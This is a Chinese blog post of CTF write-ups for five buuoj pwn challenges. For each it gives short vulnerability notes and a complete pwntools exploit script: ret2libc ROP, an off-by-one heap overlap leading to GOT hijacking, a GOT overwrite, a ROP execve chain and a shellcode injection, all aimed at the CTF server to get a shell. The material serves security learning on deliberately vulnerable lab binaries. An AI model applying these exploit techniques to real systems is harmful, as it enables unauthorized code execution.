buuoj Pwn writeup 86-90

最新推荐文章于 2023-10-03 19:35:07 发布
最新推荐文章于 2023-10-03 19:35:07 发布
阅读量233 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/114109393
版权

86 axb_2019_brop64

保护

在这里插入图片描述在这里插入图片描述花里胡哨的。

在这里插入图片描述平平无奇栈溢出。

from pwn import *

context.log_level="debug"
r = remote('node3.buuoj.cn',29649)
elf = ELF('./86')

libc = ELF("./64/libc-2.23.so")

main=0x4007d6
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_rdi=0x400963	

r.recvuntil('Please tell me:')
payload='a'*(0xd0+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
r.sendline(payload)

puts_addr=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\0'))
success('puts_addr:'+hex(puts_addr))

libc_base=puts_addr-libc.sym['puts']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh').next()

payload='a'*0xd8+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main)
r.sendline(payload)

r.interactive()

87 npuctf_2020_easyheap

保护
在这里插入图片描述
菜单堆
在这里插入图片描述create
在这里插入图片描述
结构比较简单
在这里插入图片描述
里面申请空间只能申请0x18,0x38,然后最多10个chunk。

edit
在这里插入图片描述里面明显的off by one

在这里插入图片描述
show
在这里插入图片描述
delete
在这里插入图片描述free的干干净净,也没有留下野指针。

那么能够利用的那个漏洞就只有那个off by one了。

要注意到这个题部署的环境是ubuntu 18.04,有tcache机制。而且申请的chunk也只有0x20,0x20,0x40。

以前我们见到的off by one都是说可以申请的chunk大小随便,我们就可以申请0x60的,方便泄露地址,以及最后通过fastbin_attack去攻击malloc_attack。

这个题首先你会发现它的RELSR是半开的,那么就意味着我们可以轻松的覆写它的got表。

那我们的总体思路就可以确定了,就是通过overlapp覆盖chunk,然后我们可以去轻松覆盖第一层的一个chunk,修改ptr为got表的指针,然后劫持got表,做到泄露地址,修改got表地址一系列利用,从而拿到shell。

from pwn import * 

r = remote('node3.buuoj.cn',28026)

context.log_level = "debug"

elf = ELF('./87')
context.log_level="debug"
libc = ELF('./64/libc-2.27.so')

def add(size,content):
	r.sendlineafter('Your choice :',str(1))
	r.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))
	r.sendlineafter('Content:',content)

def edit(index,content):
	r.sendlineafter('Your choice :',str(2))
	r.sendlineafter('Index :',str(index))
	r.recvuntil("Content: ")
	r.send(content)

def show(idx):
	r.sendlineafter('Your choice :',str(3))
	r.sendlineafter('Index :',str(idx))

def delete(idx):
	r.sendlineafter('Your choice :',str(4))
	r.sendlineafter('Index :',str(idx))

add(0x18,'aaaa')
add(0x18,'bbbb')
add(0x18,'/bin/sh\x00')

edit(0,'a'*0x18+'\x41')
delete(1)

payload='a'*0x10+p64(0)+p64(0x21)+p64(0x100)+p64(elf.got['free'])
add(0x38,payload)
show(1)

r.recvuntil('Content : ')
libc_base=u64(r.recvuntil('\x7f').ljust(8,'\x00'))-libc.symbols['free']
system_addr=libc_base+libc.symbols['system']

success("libc_base: " + hex(libc_base))

edit(1,p64(system_addr))

delete(2)
r.interactive()

88 picoctf_2018_got_shell

保护

在这里插入图片描述在这里插入图片描述给两个数据,能往一个地方直接写数据。

在这里插入图片描述给了后门函数。
保护的话没开PIE。

我们的一个大概思路是什么呢,首先我们发现没有栈溢出,也没有格式化字符串的漏洞给我们利用,那么我们只能想到逻辑漏洞,就是它程序逻辑上有问题,或者说检查检查的比较少。

我们其实没有什么可以利用的地址,唯一想到的就是got表的地址,或者说plt表的地址,然后我们发现RELSR开了一半,那么我们可以直接劫持got表,因为后面还会puts,所以我们直接劫持puts,然后getshell。

exp

from pwn import *

r = remote('node3.buuoj.cn',29552)

elf=ELF('./88')
puts_got=elf.got['puts']
win_addr=0x0804854B

r.sendlineafter("I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?", hex(puts_got))

r.recv()
r.sendline(hex(win_addr))

r.interactive()

89 picoctf_2018_can_you_gets_me

保护
在这里插入图片描述在这里插入图片描述要介绍两个函数。

getegid 获取用户id

setresgid 设置调用进程的实际用户ID、有效用户ID和保存的设置用户ID

这个地方设置了当前进程的实际ID,有效ID,保存设置ID之后呢,我们没有特权,所以不能调用mprotect对权限进行修改,所以这道题不能用这种方法,只能是常规rop。

在这里插入图片描述
这种题为啥会出现在这个地方……

常规栈溢出。还是去使用ROPgadget的ROP链功能。

ROPgadget --binary ./89 --ropchain

在这里插入图片描述然后给它偏移,然后记得引入库。

exp

from pwn import *
from struct import pack

p = remote('node3.buuoj.cn',27108)


def payload():
	offset = 0x18
	p = 'a' * (offset + 4)
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080b81c6) # pop eax ; ret
	p += b'/bin'
	p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea064) # @ .data + 4
	p += pack('<I', 0x080b81c6) # pop eax ; ret
	p += b'//sh'
	p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x08049303) # xor eax, eax ; ret
	p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x080481c9) # pop ebx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080de955) # pop ecx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x08049303) # xor eax, eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0806cc25) # int 0x80
	return p

shell = payload()
p.send(shell)
p.interactive()

90 picoctf_2018_shellcode

保护

在这里插入图片描述
在这里插入图片描述
开幕雷击,反编译是失败的。

还是call eax导致的。因为这里eax这个参数当函数的情况是未知的,不知道怎样去反编译。

那么我们知道,我们call的那个地址肯定是可变的。

找到它

在这里插入图片描述

这个地方把那个call的地址当参数传进了vuln,进去分析。

在这里插入图片描述能向这个参数指向的地方输入东西,然后你会发现它没有开NX,所以直接写入shellcode就好了。

from pwn import *

r=remote('node3.buuoj.cn',29126)

r.sendline(asm(shellcraft.sh()))
r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
axb_2019_brop64
qq_62887641的博客
10-03 168
64位,只开了NX程序很简单,有一点点花里胡哨,看到栈溢出,看一下有没有坑点(x。
BUUCTF 周练 Week1
weixin_44229639的博客
11-03 2748
Week 1 Q1 axb_2019_brop64(这题本来是盲打,buuoj给了源文件难度减少了很多) ​ IDA分析发现,read函数长度存在栈溢出 ​ checksec结果,没有Canary和PIE,可直接利用栈溢出构造rop ​ 本题靶机使用的是Ubuntu16 ​ 使用libc-2.23.so (或者可使用LibcSearcher 寻找对应libc) 构造rop思路: ​ 在此之前 puts函数已被调用,其GOT表被覆盖为真实的函数地址,可利用ROPgadget 得到real_puts_
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
Buuctf Http
Dexret的博客
12-07 2299
打开该靶机,发现该靶机为一个普通的页面 查看一下该网页的源码 发现有一个Secret.php的网页,打开该网页 这里提示我们需要从https://Sycsecret.buuoj.cn去访问该网页 利用Burpsuite对该网页进行抓包,添加referer值 Referer:https://Sycsecret.buuoj.cn 添加完referer值后发现,又需要我们通过Syclover浏览器去访问该网页 修改User-Agent值 User-Agent:Syclover ..
BUUOJ-[GXYCTF2019]-WEB-WP
会下雪的晴天
09-13 961
平台地址:https://buuoj.cn/ 目录Ping Ping PingBabySQli禁止套娃 Ping Ping Ping 知识点:RCE,空格及过滤的一些基本绕过 提示GET ip,应该是RCE了,ls看看有啥 尝试cat一下,发现过滤了空格,绕过一下,过滤了flag,哈哈看来不是这么简单啊,读一下源码吧 空格绕过可以用这些字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS、$IFS$1 等 试了试好像只有$I.
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
picoctf_2018_got_shell
qq_62887641的博客
09-29 220
32位,只开了NX有后门函数,并且主函数,是更改地址的程序。
buuoj 小明的保险箱 writeup
m0_73605862的博客
05-23 243
【来源】(buuoj)https://buuoj.cn/challenges#%E5%B0%8F%E6%98%8E%E7%9A%84%E4%BF%9D%E9%99%A9%E7%AE%B1。step3:根据题目提示是4位的纯数字所以是,选择所有数字,暴力破解,最大的长度和最小的长度都选择4,开始破解。得到一个rar文件夹。Step1:打开文件发现是一个图片,然后根据题目意思是有一个隐藏文件。【思路】得到隐藏文件并且暴力破解密码。Step4:得到密码,得到flag。【题目】小明的保险箱。
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1886
[RoarCTF 2019]Easy Java
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 1205
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第二次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
buuoj Pwn writeup 51-55
yongbaoii的博客
02-16 261
51 cmcc_simplerop 保护 52 pwnable_orw 保护 53 jarvisoj_level1 保护 54 roarctf_2019_easy_pwn 保护 这个全绿有点厉害。 55 picoctf_2018_buffer overflow 2 保护
PWN学习计划
m0_38029968的博客
01-12 638
PWN学习计划1月份学习计划学习目标学习方法 1月份学习计划 学习目标 1月份整体目标是学完Linux环境下包括但不限于栈溢出、格式化字符串、堆溢出等常见漏洞的成因、挖掘与利用方法: 栈溢出:ROP(ret2text,ret2shellcode,ret2syscall,ret2libc,ret2csu,ret2reg,BROP,ret2_dl_runtime_resolve,SROP,ret2V...
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1668
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
Buuoj刷题记录
meteox的博客
08-09 4614
--- title: Buuoj刷题记录 date: 2020-07-20 11:07:42 tags: 题解 categories: ctf img: https://img.buuoj.cn/buugirl/img/1.png 记录buuoj写过的题 web [HCTF 2018]WarmUp F12看到存在source.php,跳转后看到代码 <?php highlight_file(__FILE__); class emmm { publ
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值